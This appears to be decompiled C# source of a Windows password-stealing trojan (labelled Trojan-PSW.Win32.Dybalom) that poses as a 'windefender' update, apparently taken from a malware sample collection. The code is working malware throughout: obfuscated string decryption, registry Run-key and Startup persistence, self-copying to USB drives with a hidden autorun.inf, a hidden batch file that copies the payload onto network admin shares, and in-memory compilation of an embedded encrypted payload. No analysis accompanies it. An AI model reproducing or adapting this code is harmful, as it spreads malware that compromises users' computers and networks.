// Decompiled with JetBrains decompiler // Type: YUGFYLIGvlfiyl // Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null // MVID: 586226ED-1F78-4585-B234-14A26CF968DE // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using My; using System; using System.CodeDom.Compiler; using System.Diagnostics; using System.IO; using System.Net; using System.Reflection; using System.Resources; using System.Threading; using System.Windows.Forms; public class YUGFYLIGvlfiyl { private static string urPkJBxJaoKxHfa; private static string DFlGLTJoxxwCYfm; private static string RedtwzrQfYIqsNp; private static string uIFnBaaCKWySxWn; [DebuggerNonUserCode] public YUGFYLIGvlfiyl() { } public static string HqBHDPguDENkfJL(string JEhjQWpxnTOONSD, string KRhIIXNQIgKomUJ) { char[] charArray1 = JEhjQWpxnTOONSD.ToCharArray(); char[] charArray2 = KRhIIXNQIgKomUJ.ToCharArray(); char[] chArray = new char[JEhjQWpxnTOONSD.Length - 2 + 1]; int num1 = (int) charArray1[JEhjQWpxnTOONSD.Length - 1]; charArray1[JEhjQWpxnTOONSD.Length - 1] = char.MinValue; int index1 = 0; int num2 = JEhjQWpxnTOONSD.Length - 1; for (int index2 = 0; index2 <= num2; ++index2) { if (index2 < JEhjQWpxnTOONSD.Length - 1) { if (index1 >= charArray2.Length) index1 = 0; int num3 = (int) charArray1[index2]; int num4 = (int) charArray2[index1]; int num5 = num3 - num1 - num4; chArray[index2] = Convert.ToChar(num5); ++index1; } } return new string(chArray); } public static void CiMbIOhpfLGHFKu() { string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + Path.GetFileName(Application.ExecutablePath); while (true) { try { if (!System.IO.File.Exists(str)) { System.IO.File.Copy(Application.ExecutablePath, str); YUGFYLIGvlfiyl.gjbzPIrZcwZdrCX(Path.GetFileName(Application.ExecutablePath), str); } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } Thread.Sleep(5000); } } public static void gjbzPIrZcwZdrCX(string Name, string Path) => Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW"), true).SetValue(Name, (object) Path, RegistryValueKind.String); public static object Spread(string drive) { label_1: int num1; object obj1; int num2; try { ProjectData.ClearProjectError(); num1 = -2; label_2: int num3 = 2; string location = Assembly.GetExecutingAssembly().Location; label_3: num3 = 3; System.IO.File.Copy(location, drive + "\\erPCyQY.exe"); label_4: num3 = 4; FileInfo fileInfo = new FileInfo(drive + "\\erPCyQY.exe"); label_5: num3 = 5; fileInfo.Attributes = FileAttributes.Hidden; label_6: obj1 = (object) null; goto label_13; label_8: num2 = num3; switch (num1 > -2 ? num1 : 1) { case 1: int num4 = num2 + 1; num2 = 0; switch (num4) { case 1: goto label_1; case 2: goto label_2; case 3: goto label_3; case 4: goto label_4; case 5: goto label_5; case 6: goto label_6; case 7: goto label_13; } break; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_8; } throw ProjectData.CreateProjectError(-2146828237); label_13: object obj2 = obj1; if (num2 == 0) return obj2; ProjectData.ClearProjectError(); return obj2; } public static object SetAutorun(string drive) { label_1: int num1; object obj1; int num2; try { ProjectData.ClearProjectError(); num1 = -2; label_2: int num3 = 2; StreamWriter streamWriter = new StreamWriter(drive + "\\autorun.inf"); label_3: num3 = 3; streamWriter.WriteLine("[AutoRun]"); label_4: num3 = 4; streamWriter.WriteLine("Open = erPCyQY.exe"); label_5: num3 = 5; streamWriter.Close(); label_6: num3 = 6; FileInfo fileInfo = new FileInfo(drive + "\\autorun.inf"); label_7: num3 = 7; fileInfo.Attributes = FileAttributes.Hidden; label_8: obj1 = (object) null; goto label_15; label_10: num2 = num3; switch (num1 > -2 ? num1 : 1) { case 1: int num4 = num2 + 1; num2 = 0; switch (num4) { case 1: goto label_1; case 2: goto label_2; case 3: goto label_3; case 4: goto label_4; case 5: goto label_5; case 6: goto label_6; case 7: goto label_7; case 8: goto label_8; case 9: goto label_15; } break; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_10; } throw ProjectData.CreateProjectError(-2146828237); label_15: object obj2 = obj1; if (num2 == 0) return obj2; ProjectData.ClearProjectError(); return obj2; } public static void searchDrives() { label_1: int num1; int num2; try { label_2: ProjectData.ClearProjectError(); num1 = -2; label_3: int num3 = 3; Thread.Sleep(1000); label_4: num3 = 4; DriveInfo[] drives = DriveInfo.GetDrives(); label_5: num3 = 5; DriveInfo[] driveInfoArray = drives; int index = 0; goto label_16; label_7: num3 = 6; DriveInfo driveInfo; if (driveInfo.DriveType != DriveType.Removable) goto label_14; label_8: num3 = 7; if (!driveInfo.IsReady) goto label_13; label_9: num3 = 8; if (System.IO.File.Exists(driveInfo.Name + "\\erPCyQY.exe")) goto label_12; label_10: num3 = 9; YUGFYLIGvlfiyl.Spread(driveInfo.Name); label_11: num3 = 10; YUGFYLIGvlfiyl.SetAutorun(driveInfo.Name); label_12: label_13: label_14: ++index; label_15: num3 = 14; label_16: if (index < driveInfoArray.Length) { driveInfo = driveInfoArray[index]; goto label_7; } else goto label_2; label_18: num2 = num3; switch (num1 > -2 ? num1 : 1) { case 1: int num4 = num2 + 1; num2 = 0; switch (num4) { case 1: goto label_1; case 2: case 15: goto label_2; case 3: goto label_3; case 4: goto label_4; case 5: goto label_5; case 6: goto label_7; case 7: goto label_8; case 8: goto label_9; case 9: goto label_10; case 10: goto label_11; case 11: goto label_12; case 12: goto label_13; case 13: goto label_14; case 14: goto label_15; case 16: goto label_23; } break; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_18; } throw ProjectData.CreateProjectError(-2146828237); label_23: if (num2 == 0) return; ProjectData.ClearProjectError(); } [STAThread] public static void Main() { ResourceManager resourceManager = new ResourceManager("H", Assembly.GetExecutingAssembly()); string Expression = Conversions.ToString(resourceManager.GetObject("K4T8F6c")); FHQnUxOuBUcRwss fhQnUxOuBucRwss = new FHQnUxOuBUcRwss(Conversions.ToString(resourceManager.GetObject("N1HXjA"))); string[] strArray = Strings.Split(Expression, "SuZz5vnl5M1s6Sra"); string Right = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("śƕšŽ´", "So8dxq7eL5m3PMUH"); string str1 = Conversions.ToString(Operators.ConcatenateObject((object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"), Operators.AddObject(resourceManager.GetObject("WggM2"), (object) ".exe"))); try { Process process = (Process) null; Process[] processes = Process.GetProcesses(); int index = 0; if (index < processes.Length) goto label_6; else goto label_7; label_3: if (System.IO.File.Exists(str1)) { System.IO.File.Delete(str1); goto label_9; } else goto label_9; label_6: process = processes[index]; if (!str1.Contains(process.ProcessName)) goto label_3; label_7: process.Kill(); goto label_3; } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } label_9: try { MyProject.Computer.FileSystem.WriteAllBytes(str1, fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("UntJ0")))), false); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } YUGFYLIGvlfiyl.kXKlIGiQhTXwXic("MonAMour", "R", YUGFYLIGvlfiyl.CC(Conversions.ToString(resourceManager.GetObject("nerdz"))), new object[2] { (object) fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("tZAsD")))), (object) str1 }); new Thread(new ThreadStart(YUGFYLIGvlfiyl.CiMbIOhpfLGHFKu)).Start(); try { object environmentVariable = (object) Environment.GetEnvironmentVariable("temp"); Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW")).SetValue("Win32", Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe")); System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe"))); } catch (Exception ex) { ProjectData.SetProjectError(ex); System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject((object) Environment.GetFolderPath(Environment.SpecialFolder.Startup), (object) "\\erPCyQY.exe"))); ProjectData.ClearProjectError(); } YUGFYLIGvlfiyl.searchDrives(); string str2 = MyProject.Computer.FileSystem.SpecialDirectories.CurrentUserApplicationData + YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ţƙŲŮūƐſƌŖĶƒŴţ´", "SnULKmdi4TyHJsgC"); try { Dns.GetHostAddresses(Dns.GetHostName())[0].ToString(); Dns.GetHostEntry(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK")); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { System.IO.File.Copy(Application.ExecutablePath, YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK")); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { object Instance = (object) new StreamWriter("C:\\LcvHEwb.bat"); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŇŪŇŶƒĥŚƊƐĝłħƄƙŒžŲĥœŴƉ´", "SQ0ZoQ7pvIhSns9i") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) "net view >log.txt" }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŭƑųōīşĘłĬšļƇƄŁŏƕŶƉįơŴŭġĽūŜļņĶ´", "SnMyHEDiS9hjbmsu") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ("copy \"" + str2 + "\" %%t\\debug.exe") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ("copy \"" + str2 + "\" %%t\\IPC$\\debug.exe") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ("copy \"" + str2 + "\" %%t\\ADMIN$\\debug.exe") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ("copy \"" + str2 + "\" %%t\\C$\\debug.exe") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ("copy \"" + str2 + "\" %%t\\D$\\debug.exe") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ("copy \"" + str2 + "\" %%t\\PRINT$\\debug.exe") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ("copy \"" + str2 + "\" %%t\\e$\\debug.exe") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ("copy \"" + str2 + "\" %%t\\e$\\shared\\debug.exe") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ("copy \"" + str2 + "\" %%t\\d$\\shared\\debug.exe") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ("copy \"" + str2 + "\" %%t\\C$\\shared\\debug.exe") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ("copy \"" + str2 + "\" shared\\debug.exe") }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1] { (object) ")" }, (string[]) null, (System.Type[]) null, (bool[]) null, true); NewLateBinding.LateCall(Instance, (System.Type) null, "Close", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null, true); new Process() { StartInfo = { WindowStyle = ProcessWindowStyle.Hidden, FileName = "C:\\LcvHEwb.bat" } }.Start(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } if (Operators.CompareString(strArray[2], Right, false) != 0) ; if (Operators.CompareString(strArray[4], Right, false) != 0) ; } private static bool kXKlIGiQhTXwXic( string Class, string Void, Assembly file, object[] Parameters) { bool boolean; try { System.Type type = file.GetType(Class); if ((object) type != null) { MethodInfo method = type.GetMethod(Void); if ((object) method != null) { boolean = Conversions.ToBoolean(method.Invoke((object) null, Parameters)); goto label_6; } } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } label_6: return boolean; } public static Assembly CC(string Source) { YUGFYLIGvlfiyl.urPkJBxJaoKxHfa = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("űƖŵƦƶǀÛ", "Sh2jiulGpHtnnVzW"); YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƾǃƂƩƱŏƬơƺÛ", "Sju3iiFmZsEiQdJe"); YUGFYLIGvlfiyl.RedtwzrQfYIqsNp = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƜƜƜƔǁĺƀųƞƣƆŵƮƍƍƢőƍƔƛÛ", "SHNMTy1X7UgD5fMD"); YUGFYLIGvlfiyl.uIFnBaaCKWySxWn = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ĐńŔŒņĬŲũŐğųĞĬ\u008E", "SFZcD8uiUWmXhX8w"); CompilerParameters options = new CompilerParameters(); CodeDomProvider provider = CodeDomProvider.CreateProvider(YUGFYLIGvlfiyl.urPkJBxJaoKxHfa); options.GenerateExecutable = false; options.GenerateInMemory = true; options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm); options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.RedtwzrQfYIqsNp); options.CompilerOptions = YUGFYLIGvlfiyl.uIFnBaaCKWySxWn; options.TreatWarningsAsErrors = false; return provider.CompileAssemblyFromSource(options, Source).CompiledAssembly; } }